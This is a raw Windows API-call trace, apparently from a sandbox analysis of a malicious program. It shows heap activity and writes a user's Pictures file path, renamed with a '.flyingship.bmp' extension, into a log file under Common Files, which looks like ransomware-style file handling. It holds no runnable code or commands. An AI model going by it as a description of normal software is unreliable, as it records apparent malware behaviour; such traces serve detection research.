[0188.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0188.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0188.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1a0) returned 0x907778 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0188.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0188.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.966] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.967] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.967] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0188.967] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.967] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0188.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.967] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0188.967] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2b40, lpOverlapped=0x0) returned 1 [0188.967] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0188.968] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2b40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.968] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0188.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.flyingship.bmp\r\n", cchWideChar=106, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 106 [0188.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a) returned 0x906f38 [0188.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.flyingship.bmp\r\n", cchWideChar=106, lpMultiByteStr=0x906f38, cbMultiByte=106, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.flyingship.bmp\r\n", lpUsedDefaultChar=0x0) returned 106 [0188.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0188.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0188.968] WriteFile (in: hFile=0x160, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x69, lpOverlapped=0x0) returned 1 [0188.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0188.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.968] CloseHandle (hObject=0x160) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0188.970] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0188.970] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.972] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0188.973] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.973] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.973] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0188.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0188.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0188.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0188.974] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0188.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 